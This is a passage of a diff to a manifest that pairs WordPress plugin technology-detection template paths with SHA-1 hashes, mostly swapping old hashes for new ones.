+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:422f0b29743abb9c3b4ebbc9ab6c361895c6ffce +http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 +http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 +http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:3f61b31357d71ff8135352214354e138905b6c04 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0791c4846fac9d47698a4b379d5eb15d6852392c -http/technologies/wordpress/plugins/header-footer.yaml:68a714a375e2621deed4aad96b0c708ca3343444 -http/technologies/wordpress/plugins/health-check.yaml:0ae5ca762c298f069b9bb2bdf1cf3b311cead065 -http/technologies/wordpress/plugins/hello-dolly.yaml:ff27aaa1800c4f62f91d6ae647848adf0c178e16 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:4f057c8a837ce68c5ce3c74b05b14b97ca1c7b7c -http/technologies/wordpress/plugins/hostinger.yaml:ffa027c23a264c89c3adadfa5a88285114bd9d4b -http/technologies/wordpress/plugins/image-optimization.yaml:3fd8babe9ed1df1d609d0d4722b82f10305d2960 -http/technologies/wordpress/plugins/imagify.yaml:ceacdb4cbda669133fcd9277596f2efec852fdfd -http/technologies/wordpress/plugins/imsanity.yaml:999b682b34c20cc087d7610e5e9d5ad293414e9f -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:59cdc4ace262bf0f53f188302a03537a60156272 -http/technologies/wordpress/plugins/instagram-feed.yaml:9394ffec6751c8bc069f050acfe1f3f13d68a791 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a3a66fd790cd01f53f85d808b18b05778951cc25 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d +http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf +http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 +http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 +http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 +http/technologies/wordpress/plugins/image-optimization.yaml:aa50d5d2cf10f2040c9992a2c9e0d54468c7773d +http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff +http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 +http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:3d57b0b3d81cdccf9655c87e57a2822287a40bc6 -http/technologies/wordpress/plugins/jetpack.yaml:001c51a3b7f0cbcf962789ba2576e4a829551e28 -http/technologies/wordpress/plugins/kadence-blocks.yaml:91c12d3168eac9366358dcf07245431a5f3ce41f -http/technologies/wordpress/plugins/kirki.yaml:eca1577ea8851a5f06877706deb834bd68f78da9 -http/technologies/wordpress/plugins/leadin.yaml:537d8956ea86e0318f18b1063a4c588999e3186e -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:946648d4025a08e1f73154ab4c814fd3ffc3c850 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:ffbac99a7a635200773e5c43fa375a0e12a29269 -http/technologies/wordpress/plugins/litespeed-cache.yaml:b72a1f53cd951947d27bfa0818cf4a2e89dc9c3a -http/technologies/wordpress/plugins/loco-translate.yaml:ef7c5c53c5626eaabe43ae6f2e8e0dbc6810c4f6 -http/technologies/wordpress/plugins/loginizer.yaml:0df9dc2572c3ce76203fc9d9966f08364b4ef2dc +http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f +http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 +http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a +http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc +http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c +http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 +http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 +http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:5f053acf6d6521095e9f7631e5f702e45affaa90 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:e5a5cdf48f4307d331b118be891e45479f349417 -http/technologies/wordpress/plugins/mailpoet.yaml:753861efe97a36e9a5827c8fd54e08ec902dbf20 -http/technologies/wordpress/plugins/maintenance.yaml:62744232e34cad573671acba365fff23b60876e5 -http/technologies/wordpress/plugins/mainwp-child.yaml:da81d399185d1b5fb2b6d3bc7cd73f2517b241c4 -http/technologies/wordpress/plugins/malcare-security.yaml:1e933ae244a2274ace681689ebda71178714a4b3 -http/technologies/wordpress/plugins/megamenu.yaml:20aa11ada222d3ee831159cdd80c42364c793454 -http/technologies/wordpress/plugins/members.yaml:4897025884858497eca448e219fe0737ddd72098 -http/technologies/wordpress/plugins/meta-box.yaml:4b902ab494266decc7035612b68c55463227c19f -http/technologies/wordpress/plugins/metform.yaml:6c92ccfc341597820bd1712208175faddb78885a -http/technologies/wordpress/plugins/ml-slider.yaml:97571fdaf78d182de106a2c9181623c2e14018ba -http/technologies/wordpress/plugins/newsletter.yaml:29a2e79a26218010b885531d271920ebdf56801d -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:aa1f2ec430af10adfa3f69071ec1c88ccb82d9f9 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:da61599dd26a67b70d76224b4c5b19db6b3fcedf -http/technologies/wordpress/plugins/ninja-forms.yaml:dacb2f3a39dcf54fd71840832aba067bab456c17 -http/technologies/wordpress/plugins/ocean-extra.yaml:1d83abdd19199e67fb8ac6449a7a4befd7bddf09 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:40324c0c8ae0833bcc0e48d808efddc812d635b5 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:a2428347d7094ba62ae980b950972e1526174fae -http/technologies/wordpress/plugins/optinmonster.yaml:6b6b4fb1f912635d53544cbc4b59700202bcfe7e -http/technologies/wordpress/plugins/otter-blocks.yaml:20b361aa8a4dc0bf138e85b5203008d743711946 -http/technologies/wordpress/plugins/password-protected.yaml:946682b8b765c61f0816bf6f50f1c469316cf659 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b565b028b13eead5eaa05caf8d5d0dba49fd6949 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec +http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 +http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c24640887fe102fbb33e5531a4cd1c08730de2dd -http/technologies/wordpress/plugins/pixelyoursite.yaml:f6c0f3f75c1159441adde7ffc5ab61613e34de4e -http/technologies/wordpress/plugins/polylang.yaml:4c3352a3b214dec14ac1c7d6a27b1ac94957de6a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:528a440b98b7ca4f540e70f24788a2d947466a3a -http/technologies/wordpress/plugins/post-smtp.yaml:b7a58df5ccc70367ff79f12d475809e214661f9d -http/technologies/wordpress/plugins/post-types-order.yaml:bcfe70e19813e33b23eedd3ab0758617e8866719 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:7b541582bd62b9c3003aa612ff51fcbbcdfbe42f -http/technologies/wordpress/plugins/pretty-link.yaml:d1f96f1b1308d7f3f08a4e332251836a70242449 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:746f248e52a3a6098ab960f832bbdf73f270a59a -http/technologies/wordpress/plugins/really-simple-ssl.yaml:9407562693ed14a71f57a38a4bb6dff5f24fe9a7 -http/technologies/wordpress/plugins/redirection.yaml:0f50441ff128f2f2b5edc903d093dbe4728d2a6c -http/technologies/wordpress/plugins/redux-framework.yaml:34f72e5aa77705f73bbb9e438d12a7cdc41df85d -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:e847a20f4a7765e674b832b5ceb8977d061e9720 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:238ed01d2e11c3c7e2dd7706acd403ad4cb40cfd -http/technologies/wordpress/plugins/safe-svg.yaml:c4d915a22ce4878ce1ac617729a7568e9f7155d5 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3b8c102e6f1e7d125c6ae3fc4698a3f752cbfaa6 -http/technologies/wordpress/plugins/sg-cachepress.yaml:53262bb6b6067fc4acfd0db926dc0ecb05d42ecc -http/technologies/wordpress/plugins/sg-security.yaml:e95ab128f93eedaa3b4b14271538fdf0648ef7a6 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:f39e7d110d87da1f3ff0e7c26c699b3e9155ee15 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1af4ce8af134212a6855d921e3c907914175db43 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:14edf7dd17213dc22b9a53d53184ccb047195f6a +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:4f1ad7829fcfd53a4951657a3764f5d956eb18c9 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:c159316fd62e81a1757b5b919a49b5f744977113 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a4015148fa4e3ebb09aa2236c8e32467b91dc4e6 -http/technologies/wordpress/plugins/smart-slider-3.yaml:c5ddf967cdf5f90d80029db400d86f0d1bd27dbe -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:79d22df9d7f1101b03ce02c0c180c319e274aca1 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:43497b0e7d3209b528a58251b30c1598f0caa467 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:c54ec80d0aa869578ad10ea2bc3e10d75c9bbc34 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:affe137d33ef7a8dbde96bde6a994147429e4d9f +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:b53f7f695fde21424f06492b9a9cf58d1335bb87 -http/technologies/wordpress/plugins/tablepress.yaml:91f6f4e12381150941961a814305eb33bf12b79b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:3af7f1030c05a03604a83795ea3c8e5d1100f3e5 -http/technologies/wordpress/plugins/templately.yaml:8713f5b8419ea3c206fba728509b90a5ad7e7902 -http/technologies/wordpress/plugins/the-events-calendar.yaml:cb71cf41e03f2a74d0070269ebd3b41c4f62094c +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:80dae4a97ca8131b99ccb03e0fe194b479583c26 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:1303246e5183622832d550b9ff3323a393d5b0bc -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:1731539957eeb576d119822e81da4e968bcbf9a3 -http/technologies/wordpress/plugins/under-construction-page.yaml:03b80383063d1b4411f3f1cc8e7b6a137b6e2b9f +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:32de9c2afb8245195ce8187172491ca9684fb908 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:cad6e6a91ac010cd17fd1e35b1d578d56ca0e9ce +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:a0d5115e66bfa2d6dbf81090be624b4a64d73242 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:01ebdfafca132781255a6f6ec81f60382b81b9e1 -http/technologies/wordpress/plugins/webp-express.yaml:f5d13542cc139ec830aeff13e5c077929aacc80d -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:95d23d0849a642b22f87871a85d63a752a5cee0a -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:ddba317f2af879f6ad0e027d27da6655b9cbd4af -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:24b77fd6ed91430118f0cb310838227012711666 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6b2311a3f1ae8dcea5872d86304f28d2a546ba67 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:c1ea61a4e402721ef33b27308961a4087ed41d83 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:2173a4f2ec01e5fa6bd7b225795f3cc35ca2e1dc -http/technologies/wordpress/plugins/woocommerce-payments.yaml:b0f832a88e02ec946efedc142ee731db347a26cc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:658b1b735900d8a827395c8ff9ef83528cba2d61 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d6471f781b9662155fc7a9e2e984365df6bdc7c6 -http/technologies/wordpress/plugins/woocommerce-services.yaml:75d84c2ef0329f65fb0e037f3eec4aced61312da -http/technologies/wordpress/plugins/woocommerce.yaml:2b3f706bdc556453999c1c71f0d3d0f0197dbff6 -http/technologies/wordpress/plugins/wordfence.yaml:38d3ba173c391b0caa1978c3861e90de0459d0a9 -http/technologies/wordpress/plugins/wordpress-importer.yaml:3c606b380b15b889824d26556250370f9edc84cc -http/technologies/wordpress/plugins/wordpress-seo.yaml:1c1ab0737f1bdf84ec9c1cb5750d5c782ad3b9a3 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:e9d87857aeda385f37247cbaae1a14bf15d36524 -http/technologies/wordpress/plugins/wp-crontrol.yaml:48c054f88fe88cbd979b7ac455617457192e7cb2 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:e19948582e13819be5e9acf6c1d3765c3de5a704 -http/technologies/wordpress/plugins/wp-file-manager.yaml:4cf658db32d312c63cf6b5715d4a6cea2b33d9dc -http/technologies/wordpress/plugins/wp-google-maps.yaml:49221388455f512da573ed4cdd4df1f184868f6a -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:1df9e28e73d982b1a509996ba10b5b03bae1d4ea -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:171f72065feaf6cf25491a3353ee6df38e9e6b17 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:1ab1059569a2f9ef5b48112fbccfdf3e7095d3c6 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cfc8ae16b026af7ad69b9bb07b0a66d13cdbc647 -http/technologies/wordpress/plugins/wp-optimize.yaml:43d82149b10623f2d435788379b578af224e37cc -http/technologies/wordpress/plugins/wp-pagenavi.yaml:90b8467075ce059d05d674367f2729b8082bdb35 -http/technologies/wordpress/plugins/wp-reset.yaml:3641e983d6513970ad8bdf404fdb7cbb208f36f8 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:cb76d98207fa1baf92b33d2be961469f4acddbd7 -http/technologies/wordpress/plugins/wp-rollback.yaml:2af37b20a937ec5a9aa2e4e895165516f3483fdd -http/technologies/wordpress/plugins/wp-seopress.yaml:1dba7cc2c0cf24c564f6aa099ab618d0e93b0001 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:c19ab759a84a756554d6c81f3e24ca58aebb305c -http/technologies/wordpress/plugins/wp-smushit.yaml:834f754e1b911792c082cb1934e014e70db0234c -http/technologies/wordpress/plugins/wp-statistics.yaml:435065cf69fa5db3b04ebedf0a3427df7429972f -http/technologies/wordpress/plugins/wp-super-cache.yaml:04a832caf97532056c95f255f6ea64cd669f9719 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:24f928ba5f4994e6e5492698141edd9c0fbda893 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:47be55a9e105f3bd24c7c77d94fda06f52626c56 -http/technologies/wordpress/plugins/wpforms-lite.yaml:3655b4bdbe80bc61695465e4cdd5f579563c746c -http/technologies/wordpress/plugins/wps-hide-login.yaml:242631b40f523ff13bbe2626bfdd668398b1627d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c64e5fb4d749c84df32fde6adb98b7808861434d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 